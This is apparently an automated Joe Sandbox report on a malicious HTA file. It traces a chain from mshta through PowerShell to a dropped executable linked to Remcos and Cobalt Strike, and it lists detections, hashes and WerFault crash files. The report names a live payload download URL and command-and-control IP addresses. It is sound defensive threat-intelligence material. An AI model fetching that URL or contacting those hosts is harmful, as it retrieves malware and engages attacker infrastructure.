• Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (34); Security Software Discovery (141); Virtualization/Sandbox Evasion (31); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1)
• Collection: Archive Collected Data (11); Email Collection (1); Input Capture (111); Clipboard Data (3)
• Command and Control: Ingress Tool Transfer (22); Encrypted Channel (2); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (1); Application Layer Protocol (121)
• Impact: System Shutdown/Reboot (1); Defacement (1)
• Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration: no techniques marked
Behavior Graph ID: 1576256, Sample: newthingswithgreatupdateion..., Start date: 16/12/2024, Architecture: WINDOWS, Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures

Process tree (with the signatures, network contacts and dropped files attached to each node in the graph):
• mshta.exe (started): Suspicious command line found; PowerShell case anomaly found
• cmd.exe (started by mshta.exe): Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found
• powershell.exe (started by cmd.exe): network contact 192.3.179.166, ports 49730, 80, AS-COLOCROSSINGUS, United States; dropped C:\Users\user\...\nicetomeetyousweeet.exe (PE32), C:\Users\user\AppData\Local\...\ecome[1].exe (PE32), C:\Users\user\AppData\...\jxpeahvf.cmdline (Unicode); Loading BitLocker PowerShell Module; Powershell drops PE file
• conhost.exe (started by cmd.exe)
• nicetomeetyousweeet.exe (started by powershell.exe): network contact 107.173.4.16, ports 2560, 49731, 49732, AS-COLOCROSSINGUS, United States; Multi AV Scanner detection for dropped file; Contains functionality to bypass UAC (CMSTPLUA); Detected unpacking (changes PE section rights); 7 other signatures
• WerFault.exe, three instances (started by nicetomeetyousweeet.exe); 13 other processes (started by nicetomeetyousweeet.exe)
• csc.exe (started by powershell.exe): dropped C:\Users\user\AppData\Local\...\jxpeahvf.dll (PE32)
• cvtres.exe (started by csc.exe)

Source | Detection | Scanner | Label
newthingswithgreatupdateiongivenbestthingswithme.hta | 16% | ReversingLabs | Script-JS.Phishing.Generic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe | 39% | ReversingLabs | -
C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | 39% | ReversingLabs | -
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://192.3.179.166/75/ecome.exenG | 0% | Avira URL Cloud | safe
http://192.3.179.166/75/ecome.exeo | 0% | Avira URL Cloud | safe
http://192.3.179.166/75/ecome.ex | 0% | Avira URL Cloud | safe
http://192.3.179.166/75/ecome.exe | 100% | Avira URL Cloud | malware
http://192.3.179.166/75/ecome.exewC: | 0% | Avira URL Cloud | safe
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://192.3.179.166/75/ecome.exe | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | nicetomeetyousweeet.exe | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gp/C | nicetomeetyousweeet.exe, 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, nicetomeetyousweeet.exe, 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, nicetomeetyousweeet.exe, 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.1815577580.00000000046D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://192.3.179.166/75/ecome.exeo | powershell.exe, 00000003.00000002.1824736094.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000003.00000002.1815577580.0000000004E56000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://upx.sf.net | Amcache.hve.9.dr | false | - | high
http://192.3.179.166/75/ecome.ex | powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.179.166/75/ecome.exenG | powershell.exe, 00000003.00000002.1825069660.0000000007E17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.179.166/75/ecome.exewC: | powershell.exe, 00000003.00000002.1825069660.0000000007E17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1815577580.00000000046D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://go.micros | powershell.exe, 00000003.00000002.1815577580.0000000004E56000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
192.3.179.166 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
107.173.4.16 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576256
Start date and time: 2024-12-16 17:29:29 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 44
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: newthingswithgreatupdateiongivenbestthingswithme.hta
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winHTA@27/78@0/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 43
• Number of non-executed functions: 359
Cookbook Comments:
• Found application associated with file extension: .hta
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 2504 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: newthingswithgreatupdateiongivenbestthingswithme.hta
Time | Type | Description
11:30:24 | API Interceptor | 41x Sleep call for process: powershell.exe modified
11:31:12 | API Interceptor | 2821506x Sleep call for process: nicetomeetyousweeet.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.3.179.166 | crreatedbestthingswithgreatattitudeneedforthat.hta | malicious | Cobalt Strike, Remcos | 192.3.179.166/76/ecome.exe
192.3.179.166 | Smple_Order-048576744759475945.xls | malicious | Unknown | 192.3.179.166/xampp/evc/ev/crreatedbestthingswithgreatattitudeneedforthat.hta
192.3.179.166 | Smple_Order-048576744759475945.xls | malicious | Unknown | 192.3.179.166/xampp/evc/ev/crreatedbestthingswithgreatattitudeneedforthat.hta
192.3.179.166 | Sample_Order_000000991.xls | malicious | Unknown | 192.3.179.166/xampp/evc/newthingswithgreatupdateiongivenbestthingswithme.hta
192.3.179.166 | Smple_Order-048576744759475945.xls | malicious | Unknown | 192.3.179.166/xampp/evc/ev/crreatedbestthingswithgreatattitudeneedforthat.hta
192.3.179.166 | Sample_Order_000000991.xls | malicious | Unknown | 192.3.179.166/xampp/evc/newthingswithgreatupdateiongivenbestthingswithme.hta
192.3.179.166 | Sample_Order_000000991.xls | malicious | Unknown | 192.3.179.166/xampp/evc/newthingswithgreatupdateiongivenbestthingswithme.hta
107.173.4.16 | crreatedbestthingswithgreatattitudeneedforthat.hta | malicious | Cobalt Strike, Remcos | -
107.173.4.16 | WC5Gv13cOQ.rtf | malicious | Remcos | -
107.173.4.16 | BeeaCHpaO4.exe | malicious | Remcos | -
107.173.4.16 | na.rtf | malicious | Remcos | -
107.173.4.16 | PO-00006799868.xls | malicious | Remcos | -
107.173.4.16 | PO-95958694495545.xls | malicious | Remcos | -
107.173.4.16 | SecuriteInfo.com.FileRepMalware.12793.28433.exe | malicious | Remcos, GuLoader | -
107.173.4.16 | file.exe | malicious | Remcos, GuLoader | -
107.173.4.16 | 5UQ2Xybm0q.hta | malicious | Cobalt Strike, Remcos, GuLoader | -
107.173.4.16 | SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe | malicious | Remcos, GuLoader | -
                                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | crreatedbestthingswithgreatattitudeneedforthat.hta | malicious | Cobalt Strike, Remcos | 107.173.4.16
AS-COLOCROSSINGUS | Smple_Order-048576744759475945.xls | malicious | Unknown | 192.3.179.166
AS-COLOCROSSINGUS | Smple_Order-048576744759475945.xls | malicious | Unknown | 192.3.179.166
AS-COLOCROSSINGUS | Document.xla.xlsx | malicious | Unknown | 172.245.123.12
AS-COLOCROSSINGUS | Sample_Order_000000991.xls | malicious | Unknown | 192.3.179.166
AS-COLOCROSSINGUS | Smple_Order-048576744759475945.xls | malicious | Unknown | 192.3.179.166
AS-COLOCROSSINGUS | Document.xla.xlsx | malicious | Unknown | 172.245.123.12
AS-COLOCROSSINGUS | Sample_Order_000000991.xls | malicious | Unknown | 192.3.179.166
AS-COLOCROSSINGUS | Document.xla.xlsx | malicious | Unknown | 172.245.123.12
AS-COLOCROSSINGUS | Sample_Order_000000991.xls | malicious | Unknown | 192.3.179.166
                                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | crreatedbestthingswithgreatattitudeneedforthat.hta | malicious | Cobalt Strike, Remcos | -
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe | crreatedbestthingswithgreatattitudeneedforthat.hta | malicious | Cobalt Strike, Remcos | -
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9043233914564692
Encrypted: false
SSDEEP: 192:4ADbJ8n3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:ZunCJsAnbcA/jTzuiFpY4IO8M
MD5: E8BF9F7D67C61361A62EC8A82A01AAD2
SHA1: 9822B67F47F9ACE060DF945AD69E2AFD2895FEAF
SHA-256: 775A32FF5F8743FE54835D31F0DBA26133010D5658877A373FEFD30EB3C17713
SHA-512: B9F50B829E13AEBB90885344204967A5124C1E7D73A05C8B6C912FFED02C31D60649EF664A0E4647418C6060DD9E819522821A5DDE202C5989C9C5F236DC9868
Malicious: false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.4.3.7.3.9.2.7.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.0.6.8.4.5.2.-.9.3.d.b.-.4.d.3.1.-.b.d.6.f.-.b.d.a.e.7.d.e.7.3.2.f.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.8.f.6.2.1.f.-.4.a.8.0.-.4.b.c.d.-.a.c.7.e.-.a.6.3.b.b.9.9.a.f.d.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9043156886556523
Encrypted: false
SSDEEP: 192:/pDbJ8g3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:/dugCJsAnbcA/jTzuiFpY4IO8M
MD5: 843005C9DBC7C5B56AF00E5C76FA0CB3
SHA1: 4B5D49CF52DC85C6628846EF2D15CFA16B813625
SHA-256: 381CC351D81BBEA02ED0460D52B0B75B3BD8B4D9DF895B2B7AB04E8A1D0F6B10
SHA-512: 75C2F921DD96D95D73118A74EC9B4FD9E7C17D697614AC0493BA45609E75164FE6AFCFE31FDC3825614ACBEF427C2B15ED8E549F7A9A693BEDD0DEAD6AACA507
Malicious: false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402372327182 ReportType=2 Consent=1 ReportIdentifier=4099c4ce-bbe2-4184-bfcf-bb7bfc5babd8 IntegratorReportIdentifier=72ef8c35-365c-40e2-92c1-87494cdd0f9b Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9049181551386036
                                                                            Encrypted:false
                                                                            SSDEEP:192:8m/DbJ8e3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:brueCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:F00C32295D0F7531FA3A946080980F3B
                                                                            SHA1:6ED2C0BBFE696A544DEDF77370F119D5680B7A74
                                                                            SHA-256:A0A37F8A9E294F81AE7F52A7DC2CBEB4403B5717302AAA304AA747B4DCDBA84D
                                                                            SHA-512:FD3F946A255B68C9075FE2C8038E7A675A67341CD357E358FC0BDF46698ED3FB7E4F119A8B0C0C096E9E4E7A98307EAE3DAF1759C2E0C34D54B5303BF04F058A
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402529957832 ReportType=2 Consent=1 ReportIdentifier=7194c2d6-2f04-4aeb-9d72-ff0fbd314fbe IntegratorReportIdentifier=353c11c1-3a5f-4771-b35a-e9b500a3471f Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9047142143898159
                                                                            Encrypted:false
                                                                            SSDEEP:192:BDDbJ8x3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:BnuxCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:4B7B0F3928D8C0E8C93F8837DFEF2141
                                                                            SHA1:12B8F049FB7E27D1989B2E941CA4F8C6875C90F4
                                                                            SHA-256:976099AA15779E75651D04F66854E6EFB10461F972F294860959545DED8F0A37
                                                                            SHA-512:A9DA85F4C2960F684375CEE8CEC8305093011FC583EF5EBBA36BA975B12288F15B8A1CD4A8CAB16164AD3EE6A2C4733659FE1DA3DE2A480229D6D5150FB084DF
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402499138868 ReportType=2 Consent=1 ReportIdentifier=7b64117c-c24a-4b54-be69-4f098fa42484 IntegratorReportIdentifier=ca3bf77d-7c66-469a-89e9-a0614d0f9d4f Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.904744338323651
                                                                            Encrypted:false
                                                                            SSDEEP:192:eDbJ8W3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:6uWCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:C2DA896687DF6F225B757BE96E2446FB
                                                                            SHA1:063BF51BE74F08A6307D7099770CE6BE2F5548CA
                                                                            SHA-256:506D89ACA6DCA3DAF40AE755EB887FC1BAC14EB58C97789164E0417FF091CB5C
                                                                            SHA-512:40A6FFE32596AA0B9C03067CEA23F1E9789B0B0D1BFC8505565A9BFF441ECD86A7F1221D9F239739856B080C317E4B28D9117D9A7811314CEEEBFEC5DBCBE8D0
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402467855102 ReportType=2 Consent=1 ReportIdentifier=b45c7b55-2f28-47c6-aede-81446fead9c2 IntegratorReportIdentifier=442c8247-2169-4563-8c4f-33d857843092 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9046336798319352
                                                                            Encrypted:false
                                                                            SSDEEP:192:wgDbJ8G3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:wUuGCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:6A5EAE17DB9E92EFC5E6F1BC7CB39C87
                                                                            SHA1:5672883CDBDD453C5E65F560222DE393822DDD6D
                                                                            SHA-256:0B905EC27271243EAFAEC821C252913E03905AFDBE31591BF3B0403FB2AFBD69
                                                                            SHA-512:F979AC3255AD3AB5B990C4414FADCB97EE52CEEAD7F80266118BF5FF7E309C4633F2A7254E0A9C1B068F2EAE5C416237AC220BEC812CC4E3DF82EC2C7C9DD48B
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402409410614 ReportType=2 Consent=1 ReportIdentifier=c1b5a384-2cd1-41c2-a28d-86947df22984 IntegratorReportIdentifier=e626f330-94f8-4bce-ac5a-94a65ead4035 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9046499282920402
                                                                            Encrypted:false
                                                                            SSDEEP:192:rDbJ8H3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:fuHCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:21543C3054D2D99CD93F84D7B04C7E5A
                                                                            SHA1:F8E50C85CBB1674CF9DFAAC5F2F499037CA7534D
                                                                            SHA-256:B0808ED7D92A24E2995FB957486CC86E0099A1D48EBA7F035FD2EAB095BF51B9
                                                                            SHA-512:99F5B0EA0FD371241A3FE35AA838405D7DF140EFE4B5D05088F69D2B648C2B755028577982373826190E66BB08BB0C93799A749E0952126D29D33C8948B50709
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402566811198 ReportType=2 Consent=1 ReportIdentifier=e6c78637-e7e6-4fc6-af0a-19bc5b4574c3 IntegratorReportIdentifier=ba31ce71-c760-41da-b0e3-ba7439af5354 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9045575641706946
                                                                            Encrypted:false
                                                                            SSDEEP:192:CDbJ8O3B056rxf6js2ZrprzuiFpZ24IO824i:2uOS56rQjTzuiFpY4IO8M
                                                                            MD5:41DA96C15977ABE3DBBCA08418895C45
                                                                            SHA1:239B6720EDF85F3E4F2EDA329771011248F1F66D
                                                                            SHA-256:E6471FFA67B2C6B16BF52EFE32BF735BB4C7B5CCB3E0F9189F11D8A5B62F843D
                                                                            SHA-512:3A1A688BE5BFC06A2B42176126F29D7ED47638D8FFE1B2576BEDEB293634FA95B97EB55CA823511FB44C5BD7C726034B6E9DCF0CA9C6F5BB8453394C8DF5883B
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402514191460 ReportType=2 Consent=1 ReportIdentifier=09d38f23-d8cf-48fa-b7b7-a3e1d1c6367c IntegratorReportIdentifier=1412dfb5-74ed-4cb0-9533-134ea23da283 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9046767939748109
                                                                            Encrypted:false
                                                                            SSDEEP:192:dDbJ8r3B056rxf6js2ZrprzuiFpZ24IO824i:JurS56rQjTzuiFpY4IO8M
                                                                            MD5:3D756E6CF18915D37BD3AB2FB7DAD6F7
                                                                            SHA1:4BF7EE516013CAD5E0DE33EAA508C28CA26AF863
                                                                            SHA-256:72A1E790C68876B529CB4CFFE9C94779938F11CD9EC9568774FAF5A23D4F3BC4
                                                                            SHA-512:0ABD3105F034CFFAD976674A12A135AA1FCE01A6FA3DB1182B6FDACB2BD6CB7ADFD0907073740C7F21858CF23528CB364F7DC198F33F4E57BED0D98DFD2E6724
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402479113257 ReportType=2 Consent=1 ReportIdentifier=127b9835-edd9-4526-bde7-aae0666f7205 IntegratorReportIdentifier=a5b1fa31-3e8c-4079-b8f3-c21124d05b5d Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9049429883961965
                                                                            Encrypted:false
                                                                            SSDEEP:192:LGSDbJ883B056rxf6js2ZrprzuiFpZ24IO824i:yGu8S56rQjTzuiFpY4IO8M
                                                                            MD5:880D84034DF6AB009185C8D9F6642456
                                                                            SHA1:24462E4A4481019F12D12337C267D79D5A697931
                                                                            SHA-256:73F85D1708450D836EBA5E4D7D84FD2DB10BDB8177B0AD6D8E8BA8899390C7B9
                                                                            SHA-512:614F1BA851B1D8E19DA42488D228A349EA06B6AB045CDC071E749F9864612C3C9DEADFFB5076A8CE27494F1C10764A8CA3C0C439CFF75FD13F5A92ED21A90554
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402542864522 ReportType=2 Consent=1 ReportIdentifier=31617c49-59cc-49e9-b8f5-d39acc1fdc22 IntegratorReportIdentifier=36c77b68-0659-404f-b989-226494d1d730 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.8771634433821058
                                                                            Encrypted:false
                                                                            SSDEEP:192:l7DbJ8p3B056rxf6js2ZruzuiFpZ24IO824i:lvupS56rQjozuiFpY4IO8M
                                                                            MD5:8A10ECF09A2B714C665BB1BA8C0436CC
                                                                            SHA1:47657049788424038998A76FC33779EE72C1D1CB
                                                                            SHA-256:D6F23126A9BF0106858924AED15B487B8BEC2ED4389510CEEB1CAD19312CDE9B
                                                                            SHA-512:FDB666D2969544CE8AFED466A12AC8014C6EE2C85EB1C1D3F92A191EA5B903E80B0D1C14D811B687A48A9DE1CEF5D803B287922F9991985B836EBD022C772EDD
                                                                            Malicious:false
                                                                             Preview:Version=1 EventType=BEX EventTime=133788402351930483 ReportType=2 Consent=1 ReportIdentifier=45582567-100e-4870-b8cb-3a8089fa6d16 IntegratorReportIdentifier=df23a73d-c38d-4d35-9ef9-2df4c6d5f5b4 Wow64Host=34404 Wow64Guest=332 NsAppName=nicetomeetyousweeet.exe AppSessionGuid=00001bb0-0001-0014-9b8a-f9d3d74fdb01 TargetAppId=W:0006a5c37a0d05504c0f20e4cd9f901b641e0000ffff!0000ce4c380f2748f375904c17b38d4f93e294fef4f6!nicetomeetyousweeet.exe TargetAppVer=2024//11//01:08:29:31!0!nicetomeety
